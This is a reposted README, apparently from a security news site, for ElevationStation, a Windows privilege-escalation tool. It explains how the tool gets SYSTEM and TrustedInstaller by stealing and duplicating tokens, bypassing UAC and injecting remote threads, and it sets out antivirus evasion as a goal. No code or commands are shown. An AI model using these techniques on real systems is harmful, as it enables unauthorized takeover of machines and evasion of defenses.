Elevationstation – Elevate To SYSTEM Any Way We Can! Metasploit And PSEXEC Getsystem Alternative

101364924fc1817a7937b7094860beaf25c71349d1923ec15f14ac258f362344


Elevation Station

Stealing and Duplicating SYSTEM tokens for fun & profit! We duplicate things, make twin copies, and then ride away.

You have used Metasploit’s getsystem and SysInternals PSEXEC for getting system privs, correct? Well, here’s a similar standalone version of that…but without the AV issues…at least for now 

This tool also enables you to become TrustedInstaller, similar to what Process Hacker/System Informer can do. This functionality is very new and added in the latest code release and binary release as of 8/12/2023!

If you like this tool and would like to help support me in my efforts improving this solution and others like it, please feel free to hit me up on Patreon! https://patreon.com/G3tSyst3m


quick rundown on commands

Bypass UAC and escalate from medium integrity to high (must be member of local admin group)

8bebcc48f1757c16780ea3bf1ea5993ebd2bf37aefb9ec438419c7c3663c3698


Become Trusted Installer!

5d1b025f07b94dd95705c510ff5d04bedde9898747e0742ec5e3fef3c1b5ccf6


Duplicate Process Escalation Method

6f9cbc56202d68b807f466411020cd53c3f38d661ab3cf7bfa64007568dbaa53


Duplicate Thread Escalation Method

e9356cd1c2128d5bbc90fff330533a4eb12949c1d929241a99ef462fad88ea69


Named Pipes Escalation method

e1e5bea5f2b4efcaca6c1c6b9b2d6374ed5979973c9c9bdd68474800130188ea


Create Remote Thread injection method

1ea82a86b52799c1d7aa70d0799dff4245eb364150ecc93dc86da5e1584fa704


What it does

ElevationStation is a privilege escalation tool. It works by borrowing from commonly used escalation techniques involving manipulating/duplicating process and thread tokens.

Why reinvent the wheel with yet another privilege escalation utility?

This was a combined effort between avoiding AV alerts using Metasploit and furthering my research into privilege escalation methods using tokens. In brief: My main goal here was to learn about token management and manipulation, and to effectively bypass AV. I knew there were other tools out there to achieve privilege escalation using token manip but I wanted to learn for myself how it all works.

So…How does it work?

Looking through the terribly organized code, you’ll see I used two primary methods to get SYSTEM so far; stealing a Primary token from a SYSTEM level process, and stealing an Impersonation thread token to convert to a primary token from another SYSTEM level process. That’s the general approach at least.

CreateProcessAsUser versus CreateProcessWithToken

This was another driving force behind furthering my research. Unless one resorts to using named pipes for escalation, or inject a dll into a system level process, I couldn’t see an easy way to spawn a SYSTEM shell within the same console AND meet token privilege requirements.

Let me explain…

When using CreateProcessWithToken, it ALWAYS spawns a separate cmd shell. As best that I can tell, this “bug” is unavoidable. It is unfortunate, because CreateProcessWithToken doesn’t demand much as far as token privileges are concerned. Yet, if you want a shell with this Windows API you’re going to have to resort to dealing with a new SYSTEM shell in a separate window

That leads us to CreateProcessAsUser. I knew this would spawn a shell within the current shell, but I needed to find a way to achieve this without resorting to using a windows service to meet the token privilege requirements, namely:

  • SE_ASSIGNPRIMARYTOKEN_NAME TEXT(“SeAssignPrimaryTokenPrivilege”)
  • SE_INCREASE_QUOTA_NAME TEXT(“SeIncreaseQuotaPrivilege”)

I found a way around that…stealing tokens from SYSTEM process threads 🙂 We duplicate the thread IMPERSONATION token, set the thread token, and then convert it to primary and then re-run our enable privileges function. This time, the enabling of the two privileges above succeeds and we are presented with a shell within the same console using CreateProcessAsUser. No dll injections, no named pipe impersonations, just token manipulation/duplication.

Progress

This has come a long way so far…and I’ll keep adding to it and cleaning up the code as time permits me to do so. Thanks for all the support and testing!




A considerable amount of time and effort goes into maintaining this website, creating backend automation and creating new features and content for you to make actionable intelligence decisions. Everyone that supports the site helps enable new functionality.

If you like the site, please support us on “Patreon” or “Buy Me A Coffee” using the buttons below

 To keep up to date follow us on the below channels.